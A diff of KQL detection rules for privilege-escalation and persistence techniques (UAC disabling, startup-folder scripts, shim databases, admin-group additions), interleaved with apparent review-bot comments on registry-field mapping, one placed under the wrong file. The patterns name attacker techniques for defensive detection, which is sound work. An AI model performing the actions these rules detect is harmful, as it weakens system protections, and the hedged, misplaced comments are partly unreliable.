+// - Legitimate processes that run at logon. Filter according to your environment
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
index 549a2d51..1dbaae77 100644
--- a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious Screensaver Binary File Creation
-// Author: frack113
-// Date: 2021-12-29
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002
-
-DeviceFileEvents
+// Title: Suspicious Screensaver Binary File Creation
+// Author: frack113
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002
+
+DeviceFileEvents
 | where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
index ca67fbfe..3631267b 100644
--- a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-18
-// Level: high
-// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
-
-DeviceProcessEvents
+// Title: Suspicious Service DACL Modification Via Set-Service Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql
index 4c4db164..e5929ec1 100644
--- a/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Shim Database Patching Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-01
-// Level: high
-// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
-
-DeviceRegistryEvents
+// Title: Suspicious Shim Database Patching Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
index afbe4a05..832de81f 100644
--- a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
@@ -1,14 +1,14 @@
-// Title: Suspicious Startup Folder Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2022-08-10
-// Level: high
-// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.
-// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.
-// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001
-// False Positives:
-// - Rare legitimate usage of some of the extensions mentioned in the rule
-
-DeviceFileEvents
+// Title: Suspicious Startup Folder Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.
+// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.
+// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001
+// False Positives:
+// - Rare legitimate usage of some of the extensions mentioned in the rule
+
+DeviceFileEvents
 | where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql
index 8892aae9..fbb6d960 100644
--- a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Userinit Child Process
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
-// Date: 2019-06-17
-// Level: medium
-// Description: Detects a suspicious child process of userinit
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
-// False Positives:
-// - Administrative scripts
-
-DeviceProcessEvents
+// Title: Suspicious Userinit Child Process
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
+// Date: 2019-06-17
+// Level: medium
+// Description: Detects a suspicious child process of userinit
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql
index 3e913122..17ebc6de 100644
--- a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql
+++ b/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql
@@ -1,12 +1,12 @@
-// Title: Sysinternals PsService Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
-// False Positives:
-// - Legitimate use of PsService by an administrator
-
-DeviceProcessEvents
+// Title: Sysinternals PsService Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-16
+// Level: medium
+// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+// False Positives:
+// - Legitimate use of PsService by an administrator
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql
index 6bdb231f..f133c883 100644
--- a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql
+++ b/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql
@@ -1,10 +1,10 @@
-// Title: Sysinternals PsSuspend Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
-
-DeviceProcessEvents
+// Title: Sysinternals PsSuspend Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: medium
+// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql
index 217ecf3a..cf332362 100644
--- a/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: System Scripts Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: System Scripts Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
index 4303ff41..45b379a0 100644
--- a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
+++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
@@ -1,12 +1,12 @@
-// Title: Tasks Folder Evasion
-// Author: Sreeman
-// Date: 2020-01-13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001
-
-DeviceProcessEvents
+// Title: Tasks Folder Evasion
+// Author: Sreeman
+// Date: 2020-01-13
+// Level: high
+// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
+// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
+// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
index 516509cd..7d60d5c1 100644
--- a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
+++ b/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql
@@ -1,12 +1,12 @@
-// Title: Triple Cross eBPF Rootkit Default Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-05
-// Level: high
-// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Triple Cross eBPF Rootkit Default Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "ebpfbackdoor"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
index 39e864a4..a79e662c 100644
--- a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
+++ b/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
@@ -1,10 +1,10 @@
-// Title: TrustedPath UAC Bypass Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-27
-// Level: critical
-// Description: Detects indicators of a UAC bypass method by mocking directories
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceProcessEvents
+// Title: TrustedPath UAC Bypass Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-27
+// Level: critical
+// Description: Detects indicators of a UAC bypass method by mocking directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql
index e9051e8b..170acc2d 100644
--- a/KQL/rules/Privilege Escalation/uac_disabled.kql
+++ b/KQL/rules/Privilege Escalation/uac_disabled.kql
@@ -1,10 +1,10 @@
-// Title: UAC Disabled
-// Author: frack113
-// Date: 2022-01-05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Disabled
+// Author: frack113
+// Date: 2022-01-05
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql
index b9ef9d72..6a4f12e4 100644
--- a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql
+++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql
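Review bot: The predicate `RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"` on the new `| where` line treats the value name as the last component of the key path, which is the Sysmon `TargetObject` convention; in the MDE `DeviceRegistryEvents` schema the value name is reported in the separate `RegistryValueName` column, so if that holds here the key path never ends in `\EnableLUA` and this rule cannot fire. The literal `RegistryValueData =~ "DWORD (0x00000000)"` is likewise Sysmon's rendering of a DWORD, and MDE, as far as I know, reports the bare number. I would rewrite the line as `| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" and RegistryValueName =~ "EnableLUA" and RegistryValueData == "0"` and confirm it against a live event before merging. Since the commit message credits the regenerated output to a new backend, the same mapping is probably present in every converted registry rule and is worth fixing in the converter rather than by hand.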
@@ -1,12 +1,12 @@
-// Title: UAC Notification Disabled
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-05-10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-// When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Notification Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
+// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
+// When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql
index b57657bf..5c2b5725 100644
--- a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql
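Review bot: `RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"` on the new `| where` line folds the value name into the key path, and `RegistryValueData =~ "DWORD (0x00000001)"` expects Sysmon's DWORD formatting; if MDE reports the value name in `RegistryValueName` and the data as a bare number, as I believe it does, neither half of this conjunction can match and the rule is silent. I would change the line to `| where RegistryKey endswith "\\Microsoft\\Security Center" and RegistryValueName =~ "UACDisableNotify" and RegistryValueData == "1"`. Please verify against an actual `DeviceRegistryEvents` row for this key before merging, since I am inferring the schema rather than reading it from this diff.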
+++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql 
@@ -1,12 +1,12 @@
-// Title: UAC Secure Desktop Prompt Disabled
-// Author: frack113
-// Date: 2024-05-10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Secure Desktop Prompt Disabled
+// Author: frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
+// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
+// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
index d358013c..94bb8041 100644
--- a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
+++ b/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
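Review bot: The new `| where` line carries the same two Sysmon-isms as the other UAC rules in this commit: the value name `PromptOnSecureDesktop` is appended to `RegistryKey`, and the data is compared to `"DWORD (0x00000000)"`. If MDE populates `RegistryValueName` separately and stores DWORD data as a plain number, this detection never matches, which is a bad failure mode for a rule that is supposed to catch UAC prompts being moved off the secure desktop. I would write `| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" and RegistryValueName =~ "PromptOnSecureDesktop" and RegistryValueData == "0"` and validate it with a test write to that value on an onboarded host.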
@@ -1,12 +1,12 @@
-// Title: Uncommon Userinit Child Process
-// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
-// Date: 2019-01-12
-// Level: high
-// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence
-// False Positives:
-// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.
-
-DeviceProcessEvents
+// Title: Uncommon Userinit Child Process
+// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
+// Date: 2019-01-12
+// Level: high
+// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence
+// False Positives:
+// - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
index 6eceee37..644ac225 100644
--- a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
+++ b/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
@@ -1,12 +1,12 @@
-// Title: User Added To Highly Privileged Group
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-23
-// Level: high
-// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
-// False Positives:
-// - Administrative activity that must be investigated
-
-DeviceProcessEvents
+// Title: User Added To Highly Privileged Group
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+// - Administrative activity that must be investigated
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
index 0af8a856..5d365188 100644
--- a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
+++ b/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
@@ -1,12 +1,12 @@
-// Title: User Added to Local Administrators Group
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-12
-// Level: medium
-// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: User Added to Local Administrators Group
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
index a7b88820..188348f0 100644
--- a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
